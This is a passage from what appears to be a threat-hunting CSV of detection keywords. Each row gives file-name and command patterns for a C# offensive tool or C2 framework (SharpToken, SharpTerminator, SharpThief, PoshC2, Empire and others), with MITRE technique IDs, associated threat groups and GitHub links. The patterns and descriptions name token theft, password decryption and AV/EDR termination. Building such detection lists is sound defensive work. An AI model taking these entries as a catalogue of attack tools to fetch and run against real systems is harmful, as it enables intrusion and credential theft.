fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59196" "*Sharpstay.exe*",".{0,1000}Sharpstay\.exe\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59197" "*SharpStay.sln*",".{0,1000}SharpStay\.sln.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59198" "*SharpStay-master*",".{0,1000}SharpStay\-master.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59199" "*Sharp-Suite.git*",".{0,1000}Sharp\-Suite\.git.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","59200" "*SharpSvc.exe*",".{0,1000}SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59201" "*SharpSword.csproj*",".{0,1000}SharpSword\.csproj.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59202" "*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 
- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","10","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59203" "*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59204" "*SharpSword.sln*",".{0,1000}SharpSword\.sln.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59205" "*SharpSword-main.*",".{0,1000}SharpSword\-main\..{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - 
T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59206" "*SharpSystemTriggers.git*",".{0,1000}SharpSystemTriggers\.git.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59207" "*SharpSystemTriggers.sln*",".{0,1000}SharpSystemTriggers\.sln.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59208" "*SharpSystemTriggers-main*",".{0,1000}SharpSystemTriggers\-main.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59209" "*SharpTask.exe*",".{0,1000}SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59210" "*sharptelnet *",".{0,1000}sharptelnet\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59211" "*SharpTemplateResources/cmd/*",".{0,1000}SharpTemplateResources\/cmd\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59212" "*SharpTerminator.exe*",".{0,1000}SharpTerminator\.exe.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59213" "*SharpTerminator.git*",".{0,1000}SharpTerminator\.git.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate 
AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59214" "*SharpTerminator.sln*",".{0,1000}SharpTerminator\.sln.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59215" "*SharpTerminator-main.zip*",".{0,1000}SharpTerminator\-main\.zip.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59216" "*SharpThief.csproj*",".{0,1000}SharpThief\.csproj.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59217" "*SharpThief.exe*",".{0,1000}SharpThief\.exe.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature 
(invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59218" "*SharpThief.pdb*",".{0,1000}SharpThief\.pdb.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59219" "*SharpThief.Properties*",".{0,1000}SharpThief\.Properties.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59220" "*SharpThief.resources.dll*",".{0,1000}SharpThief\.resources\.dll.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59221" "*SharpThief.resources.exe*",".{0,1000}SharpThief\.resources\.exe.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version 
information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59222" "*SharpThief.sln*",".{0,1000}SharpThief\.sln.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59223" "*SharpToken execute*",".{0,1000}SharpToken\sexecute.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59224" "*SharpToken* add_user*",".{0,1000}SharpToken.{0,1000}\sadd_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59225" "*SharpToken* delete_user*",".{0,1000}SharpToken.{0,1000}\sdelete_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59226" "*SharpToken* enableUser *",".{0,1000}SharpToken.{0,1000}\senableUser\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59227" "*SharpToken* list_token*",".{0,1000}SharpToken.{0,1000}\slist_token.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59228" "*SharpToken* tscon *",".{0,1000}SharpToken.{0,1000}\stscon\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59229" "*SharpToken.csproj*",".{0,1000}SharpToken\.csproj.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59230" "*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","59231" "*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59232" "*SharpToken.git*",".{0,1000}SharpToken\.git.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59233" "*SharpToken-main.zip*",".{0,1000}SharpToken\-main\.zip.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59234" "*SharpUnhooker.*",".{0,1000}SharpUnhooker\..{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","59235" "*SharpUnhooker-main*",".{0,1000}SharpUnhooker\-main.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","59236" "*SharpUp audit*",".{0,1000}SharpUp\saudit.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59237" 
"*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59238" "*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59239" "*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","59240" "*SharpUpManager*",".{0,1000}SharpUpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59241" "*SharpUpMenu(*",".{0,1000}SharpUpMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59242" "*SharpVeeamDecryptor.exe*",".{0,1000}SharpVeeamDecryptor\.exe.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","1","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","59243" "*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59244" "*Sharpview.exe*",".{0,1000}Sharpview\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59245" "*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","59246" "*SharpView\SharpView*",".{0,1000}SharpView\\SharpView.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","59247" 
"*SharpView-master*",".{0,1000}SharpView\-master.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","59248" "*sharpweb all*",".{0,1000}sharpweb\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59249" "*SharpWeb.exe 